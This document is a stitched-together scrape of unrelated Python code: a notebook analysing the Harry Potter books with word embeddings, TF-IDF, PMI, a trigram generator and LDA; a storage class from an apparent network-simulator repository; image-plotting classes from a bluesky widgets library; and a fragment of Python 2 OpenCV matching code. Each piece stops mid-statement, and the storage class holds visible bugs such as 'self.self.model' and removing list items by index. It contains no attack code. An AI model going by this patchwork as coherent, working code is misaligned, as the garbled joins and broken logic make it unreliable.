# - Does the Harry-Ron/Harry-Hermione/Hermione-Ron occurence frequency changes along the books?
# - What is the PMI measure?
# - Are there any relevant distinct topics in HP?
# - What is the dynamic of some topics along the different books?
# ### 2.1- WORDS EMBEDDINGS
# <a id="word-embeddings"></a>
# In[74]:
'''Create dense word embeddings and investigate the similarities among different words in the Harry Potter Saga
These word embeddings are initially performed on the whole corpus without distinction between the different books.
Then there are two word embeddings for Book1 and Book7 and we look at the changes in the most similar
terms for some words they share'''
toklist = corpustot['Tokens'].to_list() #List of the Tokens
#To perform a more accurate anlysis consider the text keeping the msot relevant bigrams
phrases = Phrases(toklist)
bigram = Phraser(phrases)
bigrams = list(bigram[toklist])
#print(len(big))
# In[79]:
# TRAIN THE WORD EMBEDDINGS MODEL
w2v_model = Word2Vec(size = 300,
window = 15,
sample = 0.00001,
iter = 1000,
negative = 5 ,
min_count = 100,
workers = -1,
hs = 0)
w2v_model.build_vocab(bigrams)
w2v_model.train(bigrams, total_examples=w2v_model.corpus_count, epochs=w2v_model.epochs)
# In[80]:
w2v_model.wv.most_similar(positive=["harry"])
# In[82]:
w2v_model.wv.doesnt_match(('<NAME>'.split()))
# In[83]:
w2v_model.wv.doesnt_match('<NAME>'.split())
# In[84]:
w2v_model.wv.most_similar_to_given('harry', ['snape', 'gryffindor','hermione'])
# In[85]:
def similarities (word1, word2, word3):
'''
Define a function that gives us the related word
'''
similarities = w2v_model.wv.most_similar(
positive=[word1, word2],
negative=[word3]
)
word4 = similarities[0][0]
print('{word1} is related to {word2}, as {word3} is related to {word4}'.format(**locals()))
similarities('hermione', 'read', 'harry')
# In[15]:
'''
Create word embeddings for the tokens of book1 and book7 and look at the differences in most similar words for qrods they share
'''
toklist_1 = corpustot[corpustot['Book']=='<NAME> 1']['Tokens'].to_list()
phrases_1 = Phrases(toklist_1)
bigram_1 = Phraser(phrases_1)
bigrams_1 = list(bigram[toklist_1])
w2v_model_1 = Word2Vec(size = 200,
window = 15,
sample = 0.00001,
iter = 1000,
negative = 5 ,
min_count = 100,
workers = -1,
hs = 0)
w2v_model_1.build_vocab(bigrams_1)
w2v_model_1.train(bigrams_1, total_examples=w2v_model_1.corpus_count, epochs=w2v_model_1.epochs)
# In[16]:
w2v_model_1.wv.most_similar(positive=["harry"])
# In[17]:
toklist_7 = corpustot[corpustot['Book']=='Harry Potter 7']['Tokens'].to_list()
phrases_7 = Phrases(toklist_7)
bigram_7 = Phraser(phrases_7)
bigrams_7 = list(bigram[toklist_7])
w2v_model_7 = Word2Vec(size = 200,
window = 15,
sample = 0.00001,
iter = 1000,
negative = 5 ,
min_count = 100,
workers = -1,
hs = 0)
w2v_model_7.build_vocab(bigrams_7)
w2v_model_7.train(bigrams_7, total_examples=w2v_model_7.corpus_count, epochs=w2v_model_7.epochs)
# In[18]:
w2v_model_7.wv.most_similar(positive=["harry"])
# ### 2.2- ANALYSIS OF IMPORTANT TERMS: TF-IDF-TFIDF
# ###### Analysis of the most important terms and changes in the co-occurrences of the characters
# <a id="tfidf"></a>
# In[18]:
documents = corpustot['Instances'].to_list() #Defining the input which is a List of all the instances
# In[19]:
bookn = [1,2,3,4,5,6,7]
doc = []
for n in bookn:
docn = corpustot[corpustot['Book']=='<NAME> %s' %n]['Instances'].to_list()
doc.append(docn)
#print(doc) This is now a list of lists of instances for each book
#Contains the instances for each book
# In[20]:
'''
Creating a DataFrame containing the most frequent unigrams and thier tf, idf, tfidf measures
'''
uni_tfidf_vectorizer = TfidfVectorizer(analyzer='word', min_df=0.001, max_df=0.75, stop_words='english', sublinear_tf=True)
X = uni_tfidf_vectorizer.fit_transform(documents)
uni_vectorizer = CountVectorizer(analyzer='word', min_df=0.001, max_df=0.75, stop_words='english')
X2 = uni_vectorizer.fit_transform(documents)
#X.shape, X2.shape
uni_df = pd.DataFrame(data={'word': uni_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': uni_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
})
uni_df = uni_df.sort_values(['tfidf', 'tf', 'idf'], ascending= False)
uni_df.head()
# In[21]:
'''
Creating a DataFrame containing the most frequent bigrams and thier tf, idf, tfidf measures
'''
bi_tfidf_vectorizer = TfidfVectorizer(analyzer='word',
ngram_range=(2,2), #Now consider bigrams
min_df=0.001,
max_df=0.5,
stop_words='english',
sublinear_tf=True)
X = bi_tfidf_vectorizer.fit_transform(documents)
bi_vectorizer = CountVectorizer(analyzer='word', ngram_range=(2,2), min_df=0.001, max_df=0.5, stop_words='english')
X2 = bi_vectorizer.fit_transform(documents)
X.shape, X2.shape
bi_df = pd.DataFrame(data={'word': bi_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': bi_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
})
bi_df = bi_df.sort_values(['tfidf','idf'], ascending= False)
bi_df.head(10)
# In[22]:
''' Comparing the most frequent bigrams of the different books '''
df_book =pd.DataFrame()
for i in range(0,7):
bi_tfidf_vectorizer = TfidfVectorizer(analyzer='word',
ngram_range=(2,2),
min_df=0.001,
max_df=0.5,
stop_words='english',
sublinear_tf=True)
X = bi_tfidf_vectorizer.fit_transform(doc[i])
bi_vectorizer = CountVectorizer(analyzer='word', ngram_range=(2,2), min_df=0.001, max_df=0.5, stop_words='english')
X2 = bi_vectorizer.fit_transform(doc[i])
X.shape, X2.shape
data={'Bookn': ['%s' %(i+1) for j in range(len(bi_vectorizer.get_feature_names()))],
'word': bi_vectorizer.get_feature_names(),
'tf': X2.sum(axis=0).A1,
'idf': bi_tfidf_vectorizer.idf_,
'tfidf': X.sum(axis=0).A1
}
b_df = pd.DataFrame.from_dict(data)
b_df = b_df.sort_values(['tfidf','idf'], ascending= False)
df_book = df_book.append(b_df)
#b_df = b_df.sort_values(['tfidf','idf'], ascending= False)
df_book.head()
# In[23]:
''' Analysing the co-occurrencies of the three main characters along the 7 books. Focus on_
-Harry and Ron (HR)
-Harry and Hermione (HHe)
-Ron and Hermione (RHe)
Does their frequency show some evidence that Ron and Hermione will become a couple? [YES]
'''
HR = df_book.loc[df_book['word'].isin(['harry ron','ron harry'])]
HRsum = HR.groupby('Bookn').sum()
HHe = df_book.loc[df_book['word'].isin(['harry hermione','hermione harry'])]
HHesum = HHe.groupby('Bookn').sum()
RHe = df_book.loc[df_book['word'].isin(['hermione ron','ron hermione'])]
RHesum = RHe.groupby('Bookn').sum()
HR_HHe = HRsum.join(HHesum,lsuffix='_hr', rsuffix='_hhe', on='Bookn')
HR_HHe_RHe = HR_HHe.join(RHesum.add_suffix('_rhe'), on='Bookn')
HR_HHe_RHe = HR_HHe_RHe[['tf_hr', 'tf_hhe','tf_rhe']]
HR_HHe_RHe
# ### 2.3- Pointwise Mutual Information (PMI)
# <a id="PMI"></a>
# In[24]:
corpus =[]
stopwords_ = set(stopwords.words('english'))
for i in corpustot['Tokens']:
corpus+=i
words =[word for word in corpus if len(word) > 2
and word not in stopwords_ ]
finder = BigramCollocationFinder.from_words(words)
bgm = BigramAssocMeasures()
score = bgm.mi_like
collocations = {'_'.join(bigram): pmi for bigram, pmi in finder.score_ngrams(score)}
Counter(collocations).most_common(10)
# ### 2.4- Language Generation using HP Books
# <a id="language-generation"></a>
#
# Implement Language Models to either sampling the next word or generate text
#
# In[25]:
toklist = corpustot['Tokens'].to_list() #List of lists of tokens is the input
# In[26]:
smoothing = 0.001
counts = defaultdict(lambda: defaultdict(lambda: smoothing))
for sentence in toklist:
tokens = ['*', '*'] + sentence + ['STOP']
for u, v, w in nltk.ngrams(tokens, 3):
counts[(u, v)][w] += 1
def logP(u, v, w):
return np.log(counts[(u, v)][w]) - np.log(sum(counts[(u, v)].values()))
def sentence_logP(S):
tokens = ['*', '*'] + S + ['STOP']
return sum([logP(u, v, w) for u, v, w in nltk.ngrams(tokens, 3)])
def sample_next_word(u, v):
keys, values = zip(*counts[(u, v)].items())
values = np.array(values)
values /= values.sum()
sample = np.random.multinomial(1, values)
return keys[np.argmax(sample)]
def input_generate(initial=[]):
result = ['*', '*'] + initial
next_word = sample_next_word(result[-2], result[-1])
result.append(next_word)
while next_word != 'STOP':
next_word = sample_next_word(result[-2], result[-1])
result.append(next_word)
return ' '.join(result[2:-1])
return initial
# In[27]:
sample_next_word('hermione','say'), counts[('hermione', 'say')]
# In[30]:
print(input_generate(['harry', 'look']))
# ### 2.5- TOPIC MODELING
# <a id="topic"></a>
#
# #### 2.5.1- LDA Topic Modeling
# <a id="LDA"></a>
# In[31]:
#LDA TOPIC MODELING ; Apply LDA Topic Modeling on bigrams
#Create the relevant documents to be used and the dictionary
sent_big = pd.Series(bigrams)
dictionary_big = Dictionary(sent_big)
dictionary_big.filter_extremes(no_below=50, no_above=0.2)
print(dictionary_big, flush=True)
print("translating corpus to IDs", flush=True) #Convert the corpus into its numerical IDs
ldacorpus = [dictionary_big.doc2bow(text) for text in sent_big]
print("tf-idf transformation", flush=True)
tfidfmodel = TfidfModel(ldacorpus)
model_corpus = tfidfmodel[ldacorpus]
print(sent_big[0])
print(ldacorpus[0])
print(model_corpus[0])
# In[38]:
#Computing the c_v score to choose the best numbr of topics
coherence_values = []
dev_size = 30000 #Size of the training set
eval_size = 30000 #Size of the evaluation set
for num_topics in range(5,15):
model = LdaMulticore(corpus=model_corpus[:dev_size],
id2word=dictionary_big,
num_topics=num_topics)
coherencemodel_cv = CoherenceModel(model=model,
texts=sent_big[dev_size:dev_size+eval_size],
dictionary=dictionary_big,
coherence='c_v')
cv_score = coherencemodel_cv.get_coherence()
print(num_topics, cv_score)
coherence_values.append((num_topics,cv_score))
# In[39]:
#Visualize the trend of the c_v score
import matplotlib.pyplot as plt
sns.set_context('poster')
scores = pd.DataFrame(coherence_values, columns=['num_topics','CV'])
scores.plot.line(x='num_topics', y='CV', xticks=range(5,16));
# In[40]:
#Bsed on the c_v score results a number of topics equal to 9 seems to be appropriate.
#Although higher number of toopics still have high c_score values they might be hard to interpret and not so precise
num_topics = 10
num_passes = 10
chunk_size = len(model_corpus) * num_passes/200
print(chunk_size)
start = time.time()
print("fitting model", flush=True)
model = LdaMulticore(num_topics=num_topics,
corpus=model_corpus,
id2word=dictionary_big,
workers=min(10, multiprocessing.cpu_count()-1),
passes=num_passes,
chunksize=chunk_size,
alpha=0.5)
print("done in {}".format(time.time()-start), flush=True)
topic_corpus = model[model_corpus]
#topic_corpus[0]
#Print the topics in a ore readable format transofmring them using RegEx
topic_sep | |
<reponame>Chrisys93/IcarusRepoSEND
# -*- coding: utf-8 -*-
from __future__ import division
import time
from collections import deque, defaultdict
import random
import abc
import copy
import numpy as np
from icarus.util import inheritdoc, apportionment
from icarus.registry import register_repo_policy
__all__ = [
'RepoStorage',
'RepoNull'
]
# noinspection PyTypeChecker
@register_repo_policy('REPO_STORAGE')
class RepoStorage(object):
def __init__(self, node, model, contents, storageSize, compressionRate=0.5):
"""
Constructor
Parameters
----------
maxlen :
The maximum number of items the cache can store
"""
self.node = node
self.model = model
# self.messages =
# Collection
self.Messages = []
self.processMessages = []
self.processedMessages = []
self.storedMessages = []
self.storageSize = storageSize
self.processSize = 0
self.Size = 0
self.processedSize = 0
self.mFresh = 0
self.mStale = 0
self.mOvertime = 0
self.mSatisfied = 0
self.mUnSatisfied = 0
self.mUnProcessed = 0
self.mStorTimeNo = 0
self.mStorTimeAvg = 0
self.mStorTimeMax = 0
self.mStorTime = 0
self.nrofDeletedMessages = 0
self.deletedMessagesSize = 0
self.totalReceivedMessages = 0
self.totalReceivedMessagesSize = 0
self.depletedProcMessages = 0
self.oldDepletedProcMessagesSize = 0
self.depletedProcMessagesSize = 0
self.depletedCloudProcMessages = 0
self.oldDepletedCloudProcMessagesSize = 0
self.depletedCloudProcMessagesSize = 0
self.depletedUnProcMessages = 0
self.depletedUnProcMessagesSize = 0
self.depletedPUnProcMessages = 0
self.depletedPUnProcMessagesSize = 0
self.oldDepletedUnProcMessagesSize = 0
self.depletedMessages = 0
self.depletedMessagesSize = 0
self.oldDepletedMessagesSize = 0
self.depletedCloudMessages = 0
self.oldDepletedCloudMessagesSize = 0
self.depletedCloudMessagesSize = 0
self.cachedMessages = 0
if self.model.comp_size[node]:
# self.processSize = processSize
self.compressionRate = compressionRate
processedRatio = self.compressionRate * 2
self.processedSize = self.storageSize / processedRatio
if contents is not None:
for content in contents:
self.addToStoredMessages(contents[content])
def getTotalStorageSpace(self):
return self.storageSize
def getTotalProcessedSpace(self):
return self.processedSize
def getStoredMessagesCollection(self):
self.messages = self.Messages
self.messages.extend(self.processMessages)
return self.messages
def getStoredMessages(self):
self.storedMessages = self.Messages
self.storedMessages.extend(self.processMessages)
return self.storedMessages
def getProcessMessages(self):
return self.processMessages
def getMessages(self):
return self.Messages
# @profile
def addToStoredMessages(self, sm):
"""
TODO: Check indentation herenot (in original, java implementation)
Also, check the "selfs" in the parantheses. Those should mostly
be the associated objects for which the functions are called.
Does the cache have to have a node, or is IT the node? Should
the simulator reference a node, for routing, or the cache itself?
"""
if (sm is not None):
if sm["service_type"].lower() == "non-proc":
self.Messages.append(sm)
self.Size += sm['msg_size']
elif sm["service_type"].lower() == "proc":
self.processMessages.append(sm)
self.processSize += sm['msg_size']
elif sm["service_type"].lower() == "processed":
self.processedMessages.append(sm)
elif (sm["service_type"]).lower() == "unprocessed":
self.Messages.append(sm)
self.Size += sm['msg_size']
else:
self.addToDeplMessages(sm)
self.totalReceivedMessages += 1
self.totalReceivedMessagesSize += sm['msg_size']
# add space used in the storage space """
# System.out.prln("There is " + self.getMessagesSize + " storage used")
# if (self.Size + self.processSize) >= self.storageSize:
# for app in self.node.getRouter(self.node).getApplications("ProcApplication"):
# self.procApp = app
# # System.out.prln("App ID is: " + self.procApp.getAppID)
#
# self.procApp.updateDeplBW(self.node)
# self.procApp.deplStorage(self.node)
def addToDeplMessages(self, sm):
if sm is not None:
self.depletedMessages += 1
self.depletedMessagesSize += sm['msg_size']
if sm['overtime']:
self.mOvertime += 1
if sm["service_type"] == "unprocessed":
self.mUnProcessed += 1
self.depletedUnProcMessages += 1
self.depletedUnProcMessagesSize += sm['msg_size']
if sm['satisfied']:
self.mSatisfied += 1
else:
self.mUnSatisfied += 1
if 'storTime' in sm:
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if self.mStorTimeMax < sm['storTime']:
self.mStorTimeMax = sm['storTime']
else:
curTime = time.time()
sm['storTime'] = curTime - sm['receiveTime']
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if self.mStorTimeMax < sm['storTime']:
self.mStorTimeMax = sm['storTime']
def addToDeplProcMessages(self, sm):
if (sm is not None):
self.depletedProcMessages += 1
self.depletedProcMessagesSize += sm['msg_size']
if (sm['overtime']):
self.mOvertime += 1
self.mUnSatisfied += 1
if (sm["service_type"] == "unprocessed"):
self.mUnProcessed += 1
self.depletedUnProcMessages += 1
self.depletedUnProcMessagesSize += sm['msg_size']
if (sm['storTime'] is not None):
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if (self.mStorTimeMax < sm['storTime']):
self.mStorTimeMax = sm['storTime']
else:
curTime = time.time()
sm['storTime'] = curTime - sm['receiveTime']
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if (self.mStorTimeMax < sm['storTime']):
self.mStorTimeMax = sm['storTime']
def addToCloudDeplMessages(self, sm):
if (sm is not None):
self.depletedCloudMessages += 1
self.depletedCloudMessagesSize += sm['msg_size']
if (sm['overtime']):
self.mOvertime += 1
if (sm["service_type"] == "unprocessed"):
self.mUnProcessed += 1
self.depletedUnProcMessages += 1
self.depletedUnProcMessagesSize += sm['msg_size']
if (sm['satisfied']):
self.mSatisfied += 1
else:
self.mUnSatisfied += 1
if (sm['storTime'] is not None):
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if (self.mStorTimeMax < sm['storTime']):
self.mStorTimeMax = sm['storTime']
else:
curTime = time.time()
sm['storTime'] = curTime - sm['receiveTime']
self.mStorTimeNo += 1
self.mStorTime += sm['storTime']
if (self.mStorTimeMax < sm['storTime']):
self.mStorTimeMax = sm['storTime']
self.deleteAnyMessage(sm['content'])
def addToDeplUnProcMessages(self, sm):
sm.update("type", "unprocessed")
self.self.model.repoStorage[self.node].addToStoredMessages(sm)
def addToDepletedUnProcMessages(self, sm):
if (sm is not None):
if (sm["service_type"] == "unprocessed"):
self.depletedUnProcMessages += 1
self.depletedUnProcMessagesSize += sm['msg_size']
self.mUnProcessed += 1
def getMessage(self, MessageId):
Message = None
for temp in self.Messages:
if (temp['content'] == MessageId):
i = self.Messages.index(temp)
Message = self.Messages[i]
return Message
def getProcessedMessage(self, MessageId):
processedMessage = None
for temp in self.processedMessages:
if (temp['content'] == MessageId):
i = self.processedMessages.index(temp)
processedMessage = self.processedMessages[i]
return processedMessage
def getProcessMessage(self, MessageId):
processMessage = None
for temp in self.processMessages:
if (temp['content'] == MessageId):
i = self.processMessages.index(temp)
processMessage = self.processMessages[i]
return processMessage
def getStorTimeNo(self):
return self.mStorTimeNo
def getStorTimeAvg(self):
self.mStorTimeAvg = self.mStorTime / self.mStorTimeNo
return self.mStorTimeAvg
def getStorTimeMax(self):
return self.mStorTimeMax
@property
def getNrofMessages(self):
return len(self.Messages)
def getNrofProcessMessages(self):
return len(self.processMessages)
def getNrofProcessedMessages(self):
return len(self.processedMessages)
def getMessagesSize(self):
return self.Size
def getStaleMessagesSize(self):
curTime = time.time()
size = 0
for m in self.Messages:
retrieval = m['receiveTime']
if m['shelf_life'] is not None and m['shelf_life'] <= curTime - retrieval:
size += m['msg_size']
return size
def getProcMessagesSize(self):
return self.processSize
def getProcessedMessagesSize(self):
processedUsed = 0
for msg in self.processedMessages:
processedUsed += msg['msg_size']
return processedUsed
def getFullCachedMessagesNo(self):
"""
Need to add the feedback "functions" and erfacing
TODO: Add the outward feedback message generation definitions,
like the gets below, under them.
"""
proc = self.cachedMessages
self.cachedMessages = 0
return proc
"""
*Returns the node self repo storage system is in
* @ return The node object
"""
def getnode(self):
return self.node
def hasMessage(self, MessageId, labels):
answer = None
for i in range(0, len(self.processedMessages)):
if MessageId is not None and self.processedMessages[i]['content'] == MessageId:
answer = self.processedMessages[i]
elif labels:
j_labels = []
for label in self.processedMessages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.processedMessages[i]
for i in range(0, len(self.Messages)):
if MessageId is not None and self.Messages[i]['content'] == MessageId:
answer = self.Messages[i]
elif labels:
j_labels = []
for label in self.Messages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.Messages[i]
for i in range(0, len(self.processMessages)):
if MessageId is not None and self.processMessages[i]['content'] == MessageId:
answer = self.processMessages[i]
elif labels:
j_labels = []
for label in self.processMessages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.processMessages[i]
return answer
def getProcessedMessages(self, labels):
answer = None
for i in range(0, len(self.processedMessages)):
j_labels = []
for label in self.processedMessages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.processedMessages[i]
for i in range(0, len(self.Messages)):
j_labels = []
for label in self.Messages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.Messages[i]
for i in range(0, len(self.processMessages)):
j_labels = []
for label in self.processMessages[i]['labels']:
if label in labels:
j_labels.append(label)
if (j_labels == labels):
answer = self.processMessages[i]
return answer
def deleteMessage(self, MessageId):
for i in range(0, len(self.Messages)-1):
if (self.Messages[i]["content"] == MessageId):
self.Size -= self.Messages[i]['msg_size']
self.Messages.remove(i)
return True
return False
"""
*Method
for deleting specific message to be processed
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
def deleteProcMessage(self, MessageId):
for i in (0, len(self.processMessages)-1):
if (self.processMessages[i]['content'] == MessageId):
self.processSize -= self.processMessages[i]['msg_size']
self.processMessages.remove(self.processMessages[i])
return True
return False
"""
*Method
for deleting specific message from storage
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
def deleteAnyMessage(self, MessageId):
m = self.hasMessage(MessageId, [])
if m is not None:
if m["service_type"].lower() == "proc" and self.deleteProcMessage(MessageId):
return True
elif m["service_type"].lower() == "nonproc" and self.deleteMessage(MessageId):
return True
elif m["service_type"].lower() == "unprocessed" and self.deleteMessage(MessageId):
return True
if not self.model.repoStorage[self.node]:
self.nrofDeletedMessages += 1
self.deletedMessagesSize += m['msg_size']
return False
"""
*Method
for deleting specific processed message
* @ param MessageId ID of message to be deleted
* @
return successful
deletion
status
"""
def deleteProcessedMessage(self, MessageId, report):
"""
*To
be
used in event,
for deleting processed messages
*after
"sending" / depleting
them.
TODO: Check the ifs in original code - make code right. did not report every message.
Reporting is not done right.
"""
for i in range(0, len(self.processedMessages)-1):
if self.processedMessages[i]['content'] == MessageId:
self.depletedCloudProcMessages += 1
self.depletedCloudProcMessagesSize += self.processedMessages[i]['msg_size']
if (report):
if (self.processedMessages[i]['overtime'] is not None):
if (self.processedMessages[i]['overtime']):
self.mOvertime += 1
if (self.processedMessages[i]['satisfied'] is not None):
if (self.processedMessages[i]['satisfied']):
self.mSatisfied += 1
else:
self.mUnSatisfied += 1
if (self.processedMessages[i]['Fresh'] is not None):
if (self.processedMessages[i]['Fresh']):
self.mFresh += 1
elif (not self.processedMessages[i]['Fresh']):
self.mStale += 1
self.processedMessages.remove(i)
return True
| |
there are only two dimensions.
Parameters
----------
field : string
Field name or expression
max_runs : Integer
Number of Runs to visualize at once. Default is 1.
label_maker : Callable, optional
Expected signature::
f(run: BlueskyRun, y: String) -> label: String
needs_streams : List[String], optional
Streams referred to by field. Default is ``["primary"]``
namespace : Dict, optional
Inject additional tokens to be used in expressions for x and y
axes : Axes, optional
If None, an axes and figure are created with default labels and titles
derived from the ``x`` and ``y`` parameters.
Attributes
----------
max_runs : int
Number of Runs to visualize at once. This may be changed at any point.
(Note: Increasing it will not restore any Runs that have already been
removed, but it will allow more new Runs to be added.) Runs added
with ``pinned=True`` are exempt from the limit.
runs : RunList[BlueskyRun]
As runs are appended entries will be removed from the beginning of the
last (first in, first out) so that there are at most ``max_runs``.
pinned : Frozenset[String]
Run uids of pinned runs.
figure : Figure
axes : Axes
field : String
Read-only access to field or expression
needs_streams : List[String], optional
Read-only access to streams referred to by field.
namespace : Dict, optional
Read-only access to user-provided namespace
Examples
--------
>>> model = Images("ccd")
>>> from bluesky_widgets.jupyter.figures import JupyterFigure
>>> view = JupyterFigure(model.figure)
>>> model.add_run(run)
"""
# TODO: fix x and y limits here
def __init__(
self,
field,
*,
max_runs=1,
label_maker=None,
needs_streams=("primary",),
namespace=None,
axes=None,
):
super().__init__()
if label_maker is None:
# scan_id is always generated by RunEngine but not stricter required by
# the schema, so we fail gracefully if it is missing.
def label_maker(run, field):
md = run.metadata["start"]
return f"Scan ID {md.get('scan_id', '?')} UID {md['uid'][:8]} " f"{auto_label(field)}"
self._field = field
self._label_maker = label_maker
self._namespace = namespace
if axes is None:
axes = Axes()
figure = Figure((axes,), title="")
else:
figure = axes.figure
self.axes = axes
self.figure = figure
# If the Axes' figure is not yet set, listen for it to be set.
if figure is None:
def set_figure(event):
self.figure = event.value
# This occurs at most once, so we can now stop listening.
self.axes.events.figure.disconnect(set_figure)
self.axes.events.figure.connect(set_figure)
self._run_manager = RunManager(max_runs, needs_streams)
self._run_manager.events.run_ready.connect(self._add_images)
self.add_run = self._run_manager.add_run
self.discard_run = self._run_manager.discard_run
def _add_images(self, event):
run = event.run
func = functools.partial(self._transform, field=self.field)
image = Image.from_run(func, run, label=self.field)
self._run_manager.track_artist(image, [run])
self.axes.artists.append(image)
self.axes.title = self._label_maker(run, self.field)
# TODO Set axes x, y from xarray dims
def _transform(self, run, field):
result = call_or_eval({"array": field}, run, self.needs_streams, self.namespace)
# If the data is more than 2D, take the middle slice from the leading
# axis until there are only two axes.
data = result["array"]
while data.ndim > 2:
if data.shape[0] == 0:
# Handle case where array is just initialized, with a shape like (0, y, x).
data = numpy.zeros(data.shape[1:])
continue
middle = data.shape[0] // 2
data = data[middle]
result["array"] = data
return result
@property
def field(self):
return self._field
@property
def namespace(self):
return DictView(self._namespace or {})
# Expose some properties from the internal RunManger helper class.
@property
def runs(self):
return self._run_manager.runs
@property
def max_runs(self):
return self._run_manager.max_runs
@max_runs.setter
def max_runs(self, value):
self._run_manager.max_runs = value
@property
def needs_streams(self):
return self._run_manager._needs_streams
@property
def pinned(self):
return self._run_manager._pinned
class RasteredImages:
"""
Plot a rastered image from a Run.
Parameters
----------
field : string
Field name or expression
shape : Tuple[Integer]
The (row, col) shape of the raster
label_maker : Callable, optional
Expected signature::
f(run: BlueskyRun, y: String) -> label: String
needs_streams : List[String], optional
Streams referred to by field. Default is ``["primary"]``
namespace : Dict, optional
Inject additional tokens to be used in expressions for x and y
axes : Axes, optional
If None, an axes and figure are created with default labels and titles
derived from the ``x`` and ``y`` parameters.
clim : Tuple, optional
The color limits
cmap : String or Colormap, optional
The color map to use
extent : scalars (left, right, bottom, top), optional
Passed through to :meth:`matplotlib.axes.Axes.imshow`
x_positive : String, optional
Defines the positive direction of the x axis, takes the values 'right'
(default) or 'left'.
y_positive : String, optional
Defines the positive direction of the y axis, takes the values 'up'
(default) or 'down'.
show_colorbar: boolean
Show colorbar for the image.
Attributes
----------
run : BlueskyRun
The currently-viewed Run
figure : Figure
axes : Axes
field : String
Read-only access to field or expression
needs_streams : List[String], optional
Read-only access to streams referred to by field.
namespace : Dict, optional
Read-only access to user-provided namespace
Examples
--------
>>> model = RasteredImages("intensity", shape=(100, 200))
>>> from bluesky_widgets.jupyter.figures import JupyterFigure
>>> view = JupyterFigure(model.figure)
>>> model.add_run(run)
"""
def __init__(
self,
field,
shape,
*,
max_runs=1,
label_maker=None,
needs_streams=("primary",),
namespace=None,
axes=None,
clim=None,
cmap="viridis",
extent=None,
x_positive="right",
y_positive="up",
show_colorbar=False,
):
super().__init__()
if label_maker is None:
# scan_id is always generated by RunEngine but not stricter required by
# the schema, so we fail gracefully if it is missing.
def label_maker(run, field):
md = run.metadata["start"]
return f"Scan ID {md.get('scan_id', '?')} UID {md['uid'][:8]} {field}"
self._label_maker = label_maker
# Stash these and expose them as read-only properties.
self._field = field
self._shape = shape
self._namespace = namespace
self._run = None
if axes is None:
axes = Axes()
figure = Figure((axes,), title="")
else:
figure = axes.figure
self.axes = axes
self.figure = figure
# If the Axes' figure is not yet set, listen for it to be set.
if figure is None:
def set_figure(event):
self.figure = event.value
# This occurs at most once, so we can now stop listening.
self.axes.events.figure.disconnect(set_figure)
self.axes.events.figure.connect(set_figure)
self._clim = clim
self._cmap = cmap
self._extent = extent
self._x_positive = x_positive
self._y_positive = y_positive
self._show_colorbar = bool(show_colorbar)
self._run_manager = RunManager(max_runs, needs_streams)
self._run_manager.events.run_ready.connect(self._add_image)
self.add_run = self._run_manager.add_run
self.discard_run = self._run_manager.discard_run
@property
def cmap(self):
return self._cmap
@cmap.setter
def cmap(self, value):
self._cmap = value
for artist in self.axes.artists:
if isinstance(artist, Image):
artist.style.update({"cmap": value})
@property
def clim(self):
return self._clim
@clim.setter
def clim(self, value):
self._clim = value
for artist in self.axes.artists:
if isinstance(artist, Image):
artist.style.update({"clim": value})
@property
def extent(self):
return self._extent
@extent.setter
def extent(self, value):
self._extent = value
for artist in self.axes.artists:
if isinstance(artist, Image):
artist.style.update({"extent": value})
@property
def x_positive(self):
xmin, xmax = self.axes.x_limits
if xmin > xmax:
self._x_positive = "left"
else:
self._x_positive = "right"
return self._x_positive
@x_positive.setter
def x_positive(self, value):
if value not in ["right", "left"]:
raise ValueError('x_positive must be "right" or "left"')
self._x_positive = value
xmin, xmax = self.axes.x_limits
if (xmin > xmax and self._x_positive == "right") or (xmax > xmin and self._x_positive == "left"):
self.axes.x_limits = (xmax, xmin)
elif (xmax >= xmin and self._x_positive == "right") or (xmin >= xmax and self._x_positive == "left"):
self.axes.x_limits = (xmin, xmax)
self._x_positive = value
@property
def y_positive(self):
ymin, ymax = self.axes.y_limits
if ymin > ymax:
self._y_positive = "down"
else:
self._y_positive = "up"
return self._y_positive
@y_positive.setter
def y_positive(self, value):
if value not in ["up", "down"]:
raise ValueError('y_positive must be "up" or "down"')
self._y_positive = value
ymin, ymax = self.axes.y_limits
if (ymin > ymax and self._y_positive == "up") or (ymax > ymin and self._y_positive == "down"):
self.axes.y_limits = (ymax, ymin)
elif (ymax >= ymin and self._y_positive == "up") or (ymin >= ymax and self._y_positive == "down"):
self.axes.y_limits = (ymin, ymax)
self._y_positive = value
@property
def show_colorbar(self):
"""
Display colorbar for the new images (``True``) or show the images without colorbar (``False``).
The setting does not influence the image that is already being displayed. The property
may be used to modify the value that was passed with the respective parameter of the constructor.
"""
return self._show_colorbar
@show_colorbar.setter
def show_colorbar(self, show_colorbar):
self._show_colorbar = bool(show_colorbar)
def _add_image(self, event):
run = event.run
func = functools.partial(self._transform, field=self.field)
style = {
"cmap": self._cmap,
"clim": self._clim,
"extent": self._extent,
"show_colorbar": self._show_colorbar,
}
image = Image.from_run(func, run, label=self.field, style=style)
self._run_manager.track_artist(image, [run])
md = run.metadata["start"]
self.axes.artists.append(image)
self.axes.title = self._label_maker(run, self.field)
self.axes.x_label = md["motors"][1]
self.axes.y_label = md["motors"][0]
# By default, pixels center | |
% (str(kp1[counterQ][0].pt))
print "imgQ - desc1[counterQ][0] = %s" % (str(desc1[counterQ][0]))
except:
common.DebugPrintErrorTrace()
if len(p1) >= 4:
# p1 and p2 are the matched keypoints
"""
From Section 6.1, page 391, opencv2refman.pdf:
(also http://docs.opencv.org/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html?highlight=findhomography#findhomography):
"Finds a perspective transformation between two planes."
